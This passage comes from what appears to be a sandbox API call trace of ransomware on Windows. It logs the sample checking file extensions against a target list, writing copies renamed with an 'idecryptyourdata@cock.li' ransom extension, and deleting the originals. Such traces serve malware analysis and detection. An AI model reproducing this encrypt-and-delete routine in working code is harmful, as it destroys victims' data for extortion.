lpString2=".dll") returned 1 [0179.735] lstrlenW (lpString=".xlsx") returned 5 [0179.735] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0179.735] lstrlenW (lpString=".ppt") returned 4 [0179.735] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.735] lstrlenW (lpString=".zip") returned 4 [0179.735] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.735] lstrlenW (lpString=".rar") returned 4 [0179.735] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.735] lstrlenW (lpString=".bz2") returned 4 [0179.735] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.735] lstrlenW (lpString=".7z") returned 3 [0179.735] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.735] lstrlenW (lpString=".dbf") returned 4 [0179.736] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.736] lstrlenW (lpString=".1cd") returned 4 [0179.736] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.736] lstrlenW (lpString=".jpg") returned 4 [0179.736] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.736] lstrlenW (lpString=".doc") returned 4 [0179.736] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.736] lstrlenW (lpString=".docx") returned 5 [0179.736] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0179.736] lstrlenW (lpString=".pdf") returned 4 [0179.736] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.736] lstrlenW (lpString=".xls") returned 4 [0179.736] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.736] lstrlenW (lpString=".xlsx") returned 5 [0179.736] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0179.736] lstrlenW (lpString=".ppt") returned 4 [0179.736] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.890] lstrlenW (lpString=".zip") returned 4 [0179.890] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.890] lstrlenW (lpString=".rar") returned 4 [0179.890] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.890] lstrlenW (lpString=".bz2") returned 4 [0179.890] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.890] lstrlenW (lpString=".7z") returned 3 [0179.890] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.890] lstrlenW (lpString=".dbf") returned 4 [0179.890] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.890] lstrlenW (lpString=".1cd") returned 4 [0179.890] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 67 [0179.890] lstrlenW (lpString=".jpg") returned 4 [0179.890] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.890] lstrcmpiW (lpString1=".hash", lpString2=".bat") returned 1 [0179.890] lstrlenW (lpString="i640.hash") returned 9 [0179.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.891] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=102) returned 1 [0179.891] CloseHandle (hObject=0x364) returned 1 [0179.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 0x20 [0179.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.891] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.891] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0179.893] GetLastError () returned 0x0 [0179.893] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x66, lpOverlapped=0x0) returned 1 [0179.894] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x70, lpOverlapped=0x0) returned 1 [0179.896] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.896] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe6, lpOverlapped=0x0) returned 1 [0179.896] SetEndOfFile (hFile=0x36c) returned 1 [0179.896] CloseHandle (hObject=0x36c) returned 1 [0179.896] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.896] SetEndOfFile (hFile=0x364) returned 1 [0179.897] CloseHandle (hObject=0x364) returned 1 [0179.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.897] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash")) returned 1 [0179.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.897] lstrlenW (lpString=".doc") returned 4 [0179.897] lstrcmpiW (lpString1=".doc", lpString2="hash") returned -1 [0179.897] lstrlenW (lpString=".docx") returned 5 [0179.897] lstrcmpiW (lpString1=".docx", lpString2=".hash") returned -1 [0179.897] lstrlenW (lpString=".pdf") returned 4 [0179.897] lstrcmpiW (lpString1=".pdf", lpString2="hash") returned -1 [0179.897] lstrlenW (lpString=".xls") returned 4 [0179.897] lstrcmpiW (lpString1=".xls", lpString2="hash") returned -1 [0179.897] lstrlenW (lpString=".xlsx") returned 5 [0179.897] lstrcmpiW (lpString1=".xlsx", lpString2=".hash") returned 1 [0179.898] lstrlenW (lpString=".ppt") returned 4 [0179.898] lstrcmpiW (lpString1=".ppt", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.898] lstrlenW (lpString=".zip") returned 4 [0179.898] lstrcmpiW (lpString1=".zip", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString=".rar") returned 4 [0179.898] lstrcmpiW (lpString1=".rar", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString=".bz2") returned 4 [0179.898] lstrcmpiW (lpString1=".bz2", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString=".7z") returned 3 [0179.898] lstrcmpiW (lpString1=".7z", lpString2="ash") returned -1 [0179.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.898] lstrlenW (lpString=".dbf") returned 4 [0179.898] lstrcmpiW (lpString1=".dbf", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.898] lstrlenW (lpString=".1cd") returned 4 [0179.898] lstrcmpiW (lpString1=".1cd", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.898] lstrlenW (lpString=".jpg") returned 4 [0179.898] lstrcmpiW (lpString1=".jpg", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.898] lstrlenW (lpString=".doc") returned 4 [0179.898] lstrcmpiW (lpString1=".doc", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString=".docx") returned 5 [0179.898] lstrcmpiW (lpString1=".docx", lpString2=".hash") returned -1 [0179.898] lstrlenW (lpString=".pdf") returned 4 [0179.898] lstrcmpiW (lpString1=".pdf", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString=".xls") returned 4 [0179.898] lstrcmpiW (lpString1=".xls", lpString2="hash") returned -1 [0179.898] lstrlenW (lpString=".xlsx") returned 5 [0179.898] lstrcmpiW (lpString1=".xlsx", lpString2=".hash") returned 1 [0179.898] lstrlenW (lpString=".ppt") returned 4 [0179.898] lstrcmpiW (lpString1=".ppt", lpString2="hash") returned -1 [0179.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.899] lstrlenW (lpString=".zip") returned 4 [0179.899] lstrcmpiW (lpString1=".zip", lpString2="hash") returned -1 [0179.899] lstrlenW (lpString=".rar") returned 4 [0179.899] lstrcmpiW (lpString1=".rar", lpString2="hash") returned -1 [0179.899] lstrlenW (lpString=".bz2") returned 4 [0179.899] lstrcmpiW (lpString1=".bz2", lpString2="hash") returned -1 [0179.899] lstrlenW (lpString=".7z") returned 3 [0179.899] lstrcmpiW (lpString1=".7z", lpString2="ash") returned -1 [0179.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.899] lstrlenW (lpString=".dbf") returned 4 [0179.899] lstrcmpiW (lpString1=".dbf", lpString2="hash") returned -1 [0179.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.899] lstrlenW (lpString=".1cd") returned 4 [0179.899] lstrcmpiW (lpString1=".1cd", lpString2="hash") returned -1 [0179.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 67 [0179.899] lstrlenW (lpString=".jpg") returned 4 [0179.899] lstrcmpiW (lpString1=".jpg", lpString2="hash") returned -1 [0179.899] lstrcmpiW (lpString1=".hash", lpString2=".bat") returned 1 [0179.899] lstrlenW (lpString="i641033.hash") returned 12 [0179.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.900] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=102) returned 1 [0179.900] CloseHandle (hObject=0x364) returned 1 [0179.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 0x20 [0179.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.900] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.900] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0179.900] GetLastError () returned 0x0 [0179.900] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x66, lpOverlapped=0x0) returned 1 [0179.902] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x70, lpOverlapped=0x0) returned 1 [0179.902] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.903] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xec, lpOverlapped=0x0) returned 1 [0179.903] SetEndOfFile (hFile=0x36c) returned 1 [0179.903] CloseHandle (hObject=0x36c) returned 1 [0179.903] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.903] SetEndOfFile (hFile=0x364) returned 1 [0179.905] CloseHandle (hObject=0x364) returned 1 [0179.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.905] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 1 [0179.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.905] lstrlenW (lpString=".doc") returned 4 [0179.905] lstrcmpiW (lpString1=".doc", lpString2="hash") returned -1 [0179.905] lstrlenW (lpString=".docx") returned 5 [0179.905] lstrcmpiW (lpString1=".docx", lpString2=".hash") returned -1 [0179.905] lstrlenW (lpString=".pdf") returned 4 [0179.905] lstrcmpiW (lpString1=".pdf", lpString2="hash") returned -1 [0179.905] lstrlenW (lpString=".xls") returned 4 [0179.905] lstrcmpiW (lpString1=".xls", lpString2="hash") returned -1 [0179.905] lstrlenW (lpString=".xlsx") returned 5 [0179.905] lstrcmpiW (lpString1=".xlsx", lpString2=".hash") returned 1 [0179.906] lstrlenW (lpString=".ppt") returned 4 [0179.906] lstrcmpiW (lpString1=".ppt", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.906] lstrlenW (lpString=".zip") returned 4 [0179.906] lstrcmpiW (lpString1=".zip", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString=".rar") returned 4 [0179.906] lstrcmpiW (lpString1=".rar", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString=".bz2") returned 4 [0179.906] lstrcmpiW (lpString1=".bz2", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString=".7z") returned 3 [0179.906] lstrcmpiW (lpString1=".7z", lpString2="ash") returned -1 [0179.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.906] lstrlenW (lpString=".dbf") returned 4 [0179.906] lstrcmpiW (lpString1=".dbf", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.906] lstrlenW (lpString=".1cd") returned 4 [0179.906] lstrcmpiW (lpString1=".1cd", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.906] lstrlenW (lpString=".jpg") returned 4 [0179.906] lstrcmpiW (lpString1=".jpg", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.906] lstrlenW (lpString=".doc") returned 4 [0179.906] lstrcmpiW (lpString1=".doc", lpString2="hash") returned -1 [0179.906] lstrlenW (lpString=".docx") returned 5 [0179.907] lstrcmpiW (lpString1=".docx", lpString2=".hash") returned -1 [0179.907] lstrlenW (lpString=".pdf") returned 4 [0179.907] lstrcmpiW (lpString1=".pdf", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString=".xls") returned 4 [0179.907] lstrcmpiW (lpString1=".xls", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString=".xlsx") returned 5 [0179.907] lstrcmpiW (lpString1=".xlsx", lpString2=".hash") returned 1 [0179.907] lstrlenW (lpString=".ppt") returned 4 [0179.907] lstrcmpiW (lpString1=".ppt", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.907] lstrlenW (lpString=".zip") returned 4 [0179.907] lstrcmpiW (lpString1=".zip", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString=".rar") returned 4 [0179.907] lstrcmpiW (lpString1=".rar", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString=".bz2") returned 4 [0179.907] lstrcmpiW (lpString1=".bz2", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString=".7z") returned 3 [0179.907] lstrcmpiW (lpString1=".7z", lpString2="ash") returned -1 [0179.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.907] lstrlenW (lpString=".dbf") returned 4 [0179.907] lstrcmpiW (lpString1=".dbf", lpString2="hash") returned -1 [0179.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.907] lstrlenW (lpString=".1cd") returned 4 [0179.907] lstrcmpiW (lpString1=".1cd", lpString2="hash") returned -1 [0179.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 70 [0179.908] lstrlenW (lpString=".jpg") returned 4 [0179.908] lstrcmpiW (lpString1=".jpg", lpString2="hash") returned -1 [0179.908] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0179.908] lstrlenW (lpString="IntegratedOffice.exe") returned 20 [0179.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.908] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=1093248) returned 1 [0179.908] CloseHandle (hObject=0x364) returned 1 [0179.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe")) returned 0x20 [0179.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.909] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.909] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0179.910] GetLastError () returned 0x0 [0179.910] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0181.613] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0181.636] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0xae90, lpOverlapped=0x0) returned 1 [0182.319] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xaea0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xaea0, lpOverlapped=0x0) returned 1 [0182.323] ReadFile (in: hFile=0x364, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.323] WriteFile (in: hFile=0x36c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xfc, lpOverlapped=0x0) returned 1 [0182.324] SetEndOfFile (hFile=0x36c) returned 1 [0182.324] CloseHandle (hObject=0x36c) returned 1 [0182.324] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.324] SetEndOfFile (hFile=0x364) returned 1 [0182.325] CloseHandle (hObject=0x364) returned 1 [0182.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0182.326] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\integratedoffice.exe")) returned 1 [0182.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.326] lstrlenW (lpString=".doc") returned 4 [0182.327] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0182.327] lstrlenW (lpString=".docx") returned 5 [0182.327] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0182.327] lstrlenW (lpString=".pdf") returned 4 [0182.327] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0182.327] lstrlenW (lpString=".xls") returned 4 [0182.327] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0182.327] lstrlenW (lpString=".xlsx") returned 5 [0182.327] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0182.327] lstrlenW (lpString=".ppt") returned 4 [0182.327] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0182.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.327] lstrlenW (lpString=".zip") returned 4 [0182.327] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0182.327] lstrlenW (lpString=".rar") returned 4 [0182.327] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0182.327] lstrlenW (lpString=".bz2") returned 4 [0182.327] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0182.327] lstrlenW (lpString=".7z") returned 3 [0182.327] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0182.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\IntegratedOffice.exe") returned 78 [0182.327] lstrlenW (lpString=".dbf") returned 4 [0182.327] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0182.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 